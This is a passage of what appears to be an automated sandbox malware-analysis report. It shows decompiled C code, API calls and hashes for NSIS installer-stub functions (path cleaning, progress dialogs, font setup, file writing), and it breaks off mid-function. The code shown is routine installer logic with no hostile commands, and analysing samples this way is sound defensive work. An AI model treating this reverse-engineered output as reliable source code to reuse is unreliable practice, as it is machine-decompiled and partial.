                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                                                                            • String ID: 9
                                                                                                                                                                                                                            • API String ID: 163830602-2366072709
                                                                                                                                                                                                                            • Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                                                                                                                                                                                            • Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                                                                            			E004068EF(WCHAR* _a4) {
                                                                                                                                                                                                                            				short _t5;
                                                                                                                                                                                                                            				short _t7;
                                                                                                                                                                                                                            				WCHAR* _t19;
                                                                                                                                                                                                                            				WCHAR* _t20;
                                                                                                                                                                                                                            				WCHAR* _t21;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t20 = _a4;
                                                                                                                                                                                                                            				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                                                                                                                                                                                                            					_t20 =  &(_t20[4]);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
                                                                                                                                                                                                                            					_t20 =  &(_t20[2]);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t5 =  *_t20;
                                                                                                                                                                                                                            				_t21 = _t20;
                                                                                                                                                                                                                            				_t19 = _t20;
                                                                                                                                                                                                                            				if(_t5 != 0) {
                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                            						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
                                                                                                                                                                                                                            							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                                                                                                                                                                                                            							_t19 = CharNextW(_t19);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t20 = CharNextW(_t20);
                                                                                                                                                                                                                            						_t5 =  *_t20;
                                                                                                                                                                                                                            					} while (_t5 != 0);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				 *_t19 =  *_t19 & 0x00000000;
                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                            					_push(_t19);
                                                                                                                                                                                                                            					_push(_t21);
                                                                                                                                                                                                                            					_t19 = CharPrevW();
                                                                                                                                                                                                                            					_t7 =  *_t19;
                                                                                                                                                                                                                            					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					 *_t19 =  *_t19 & 0x00000000;
                                                                                                                                                                                                                            					if(_t21 < _t19) {
                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					break;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t7;
                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                                                                                                                                                                                            • CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                                                                                                                                                                                            • CharNextW.USER32(?,00000000,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                                                                                                                                                                                            • CharPrevW.USER32(?,?,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Char$Next$Prev
                                                                                                                                                                                                                            • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                            • API String ID: 589700163-2982765560
                                                                                                                                                                                                                            • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                                                                                                                                                                                            • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040302E(intOrPtr _a4) {
                                                                                                                                                                                                                            				short _v132;
                                                                                                                                                                                                                            				long _t6;
                                                                                                                                                                                                                            				struct HWND__* _t7;
                                                                                                                                                                                                                            				struct HWND__* _t15;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				if(_a4 != 0) {
                                                                                                                                                                                                                            					_t15 =  *0x420efc; // 0x0
                                                                                                                                                                                                                            					if(_t15 != 0) {
                                                                                                                                                                                                                            						_t15 = DestroyWindow(_t15);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					 *0x420efc = 0;
                                                                                                                                                                                                                            					return _t15;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				__eflags =  *0x420efc; // 0x0
                                                                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                                                                            					return E00406A71(0);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t6 = GetTickCount();
                                                                                                                                                                                                                            				__eflags = _t6 -  *0x42a26c;
                                                                                                                                                                                                                            				if(_t6 >  *0x42a26c) {
                                                                                                                                                                                                                            					__eflags =  *0x42a268;
                                                                                                                                                                                                                            					if( *0x42a268 == 0) {
                                                                                                                                                                                                                            						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F93, 0);
                                                                                                                                                                                                                            						 *0x420efc = _t7;
                                                                                                                                                                                                                            						return ShowWindow(_t7, 5);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					__eflags =  *0x42a314 & 0x00000001;
                                                                                                                                                                                                                            					if(( *0x42a314 & 0x00000001) != 0) {
                                                                                                                                                                                                                            						wsprintfW( &_v132, L"... %d%%", E00403012());
                                                                                                                                                                                                                            						return E004056CA(0,  &_v132);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t6;
                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • DestroyWindow.USER32(00000000,00000000), ref: 00403049
                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00403067
                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 00403095
                                                                                                                                                                                                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                                                                                                                                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                                                                                                                                                              • Part of subcall function 004056CA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,004030A8), ref: 00405725
                                                                                                                                                                                                                              • Part of subcall function 004056CA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll), ref: 00405737
                                                                                                                                                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                                                                                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                                                                                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                                                                                                                                                            • CreateDialogParamW.USER32 ref: 004030B9
                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                                                                                                                                                                                                                              • Part of subcall function 00403012: MulDiv.KERNEL32(0005CD09,00000064,0005CFCE), ref: 00403027
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                                                                                                            • String ID: ... %d%%
                                                                                                                                                                                                                            • API String ID: 722711167-2449383134
                                                                                                                                                                                                                            • Opcode ID: eb5829c7fffbc7bf65dde30d15e1f0a96a9438333430517d581b7dc81546266b
                                                                                                                                                                                                                            • Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb5829c7fffbc7bf65dde30d15e1f0a96a9438333430517d581b7dc81546266b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                            				long _v8;
                                                                                                                                                                                                                            				signed char _v12;
                                                                                                                                                                                                                            				unsigned int _v16;
                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                            				long _v56;
                                                                                                                                                                                                                            				void* _v60;
                                                                                                                                                                                                                            				long _t15;
                                                                                                                                                                                                                            				unsigned int _t19;
                                                                                                                                                                                                                            				signed int _t25;
                                                                                                                                                                                                                            				struct HWND__* _t28;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t28 = _a4;
                                                                                                                                                                                                                            				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                                                                                                                                                                                                            				if(_a8 == 0) {
                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                            					_v56 = _t15;
                                                                                                                                                                                                                            					_v60 = 4;
                                                                                                                                                                                                                            					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                                                                                                                                                                                                            					return _v24;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t19 = GetMessagePos();
                                                                                                                                                                                                                            				_v16 = _t19 >> 0x10;
                                                                                                                                                                                                                            				_v20 = _t19;
                                                                                                                                                                                                                            				ScreenToClient(_t28,  &_v20);
                                                                                                                                                                                                                            				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                                                                                                                                                                                                            				if((_v12 & 0x00000066) != 0) {
                                                                                                                                                                                                                            					_t15 = _v8;
                                                                                                                                                                                                                            					goto L4;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t25 | 0xffffffff;
                                                                                                                                                                                                                            			}















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                                                                                                                                                                                                                            • GetMessagePos.USER32 ref: 00404FA2
                                                                                                                                                                                                                            • ScreenToClient.USER32 ref: 00404FBC
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                            • String ID: f
                                                                                                                                                                                                                            • API String ID: 41195575-1993550816
                                                                                                                                                                                                                            • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                                                                                                                            • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 73%
                                                                                                                                                                                                                            			E00401E4E(intOrPtr __edx) {
                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                            				int _t9;
                                                                                                                                                                                                                            				signed char _t15;
                                                                                                                                                                                                                            				struct HFONT__* _t18;
                                                                                                                                                                                                                            				intOrPtr _t30;
                                                                                                                                                                                                                            				void* _t31;
                                                                                                                                                                                                                            				struct HDC__* _t33;
                                                                                                                                                                                                                            				void* _t35;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t30 = __edx;
                                                                                                                                                                                                                            				_t33 = GetDC( *(_t35 - 8));
                                                                                                                                                                                                                            				_t9 = E00402D84(2);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                                                                                                                                                                                            				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                                                                                                                                                                                                                            				ReleaseDC( *(_t35 - 8), _t33);
                                                                                                                                                                                                                            				 *0x40ce08 = E00402D84(3);
                                                                                                                                                                                                                            				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                                                                                                                                                                                            				 *0x40ce0f = 1;
                                                                                                                                                                                                                            				 *0x40ce0c = _t15 & 0x00000001;
                                                                                                                                                                                                                            				 *0x40ce0d = _t15 & 0x00000002;
                                                                                                                                                                                                                            				 *0x40ce0e = _t15 & 0x00000004;
                                                                                                                                                                                                                            				E004066A5(_t9, _t31, _t33, "Times New Roman",  *((intOrPtr*)(_t35 - 0x2c)));
                                                                                                                                                                                                                            				_t18 = CreateFontIndirectW(0x40cdf8);
                                                                                                                                                                                                                            				_push(_t18);
                                                                                                                                                                                                                            				_push(_t31);
                                                                                                                                                                                                                            				E004065AF();
                                                                                                                                                                                                                            				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetDC.USER32(?), ref: 00401E51
                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                                                                                                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                                                                                                                                                            • ReleaseDC.USER32 ref: 00401E84
                                                                                                                                                                                                                              • Part of subcall function 004066A5: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                                                                                                                                                              • Part of subcall function 004066A5: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,00000000), ref: 004068A4
                                                                                                                                                                                                                            • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                                                                                                                                                                            • String ID: Times New Roman
                                                                                                                                                                                                                            • API String ID: 2584051700-927190056
                                                                                                                                                                                                                            • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                                                                                                                                                                                            • Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                            				short _v132;
                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                            				WCHAR* _t19;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				if(_a8 == 0x110) {
                                                                                                                                                                                                                            					SetTimer(_a4, 1, 0xfa, 0);
                                                                                                                                                                                                                            					_a8 = 0x113;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(_a8 == 0x113) {
                                                                                                                                                                                                                            					_t11 = E00403012();
                                                                                                                                                                                                                            					_t19 = L"unpacking data: %d%%";
                                                                                                                                                                                                                            					if( *0x42a270 == 0) {
                                                                                                                                                                                                                            						_t19 = L"verifying installer: %d%%";
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					wsprintfW( &_v132, _t19, _t11);
                                                                                                                                                                                                                            					SetWindowTextW(_a4,  &_v132);
                                                                                                                                                                                                                            					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 00402FE5
                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00402FF5
                                                                                                                                                                                                                            • SetDlgItemTextW.USER32 ref: 00403007
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                            • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                                                                                                            • API String ID: 1451636040-1158693248
                                                                                                                                                                                                                            • Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                                                                                                                                                                                            • Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                            			E00402950(void* __ebx, void* __eflags) {
                                                                                                                                                                                                                            				WCHAR* _t26;
                                                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                                                            				long _t37;
                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                            				void* _t52;
                                                                                                                                                                                                                            				void* _t54;
                                                                                                                                                                                                                            				void* _t56;
                                                                                                                                                                                                                            				void* _t59;
                                                                                                                                                                                                                            				void* _t60;
                                                                                                                                                                                                                            				void* _t61;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t49 = __ebx;
                                                                                                                                                                                                                            				_t52 = 0xfffffd66;
                                                                                                                                                                                                                            				_t26 = E00402DA6(0xfffffff0);
                                                                                                                                                                                                                            				_t55 = _t26;
                                                                                                                                                                                                                            				 *(_t61 - 0x40) = _t26;
                                                                                                                                                                                                                            				if(E00405FAE(_t26) == 0) {
                                                                                                                                                                                                                            					E00402DA6(0xffffffed);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				E00406133(_t55);
                                                                                                                                                                                                                            				_t29 = E00406158(_t55, 0x40000000, 2);
                                                                                                                                                                                                                            				 *(_t61 + 8) = _t29;
                                                                                                                                                                                                                            				if(_t29 != 0xffffffff) {
                                                                                                                                                                                                                            					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                                                                                                                                                                                                                            					if( *(_t61 - 0x28) != _t49) {
                                                                                                                                                                                                                            						_t37 =  *0x42a274;
                                                                                                                                                                                                                            						 *(_t61 - 0x44) = _t37;
                                                                                                                                                                                                                            						_t54 = GlobalAlloc(0x40, _t37);
                                                                                                                                                                                                                            						if(_t54 != _t49) {
                                                                                                                                                                                                                            							E004035F8(_t49);
                                                                                                                                                                                                                            							E004035E2(_t54,  *(_t61 - 0x44));
                                                                                                                                                                                                                            							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                                                                                                                                                                                                                            							 *(_t61 - 0x10) = _t59;
                                                                                                                                                                                                                            							if(_t59 != _t49) {
                                                                                                                                                                                                                            								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                                                                                                                                                                                                                            								while( *_t59 != _t49) {
                                                                                                                                                                                                                            									_t51 =  *_t59;
                                                                                                                                                                                                                            									_t60 = _t59 + 8;
                                                                                                                                                                                                                            									 *(_t61 - 0x3c) =  *_t59;
                                                                                                                                                                                                                            									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                                                                                                                                                                                                                            									_t59 = _t60 +  *(_t61 - 0x3c);
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								GlobalFree( *(_t61 - 0x10));
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                                                                                                                                                                                                                            							GlobalFree(_t54);
                                                                                                                                                                                                                            							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                                                                                                                                                                                                                            					CloseHandle( *(_t61 + 8));
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t56 = 0xfffffff3;
                                                                                                                                                                                                                            				if(_t52 < _t49) {
                                                                                                                                                                                                                            					_t56 = 0xffffffef;
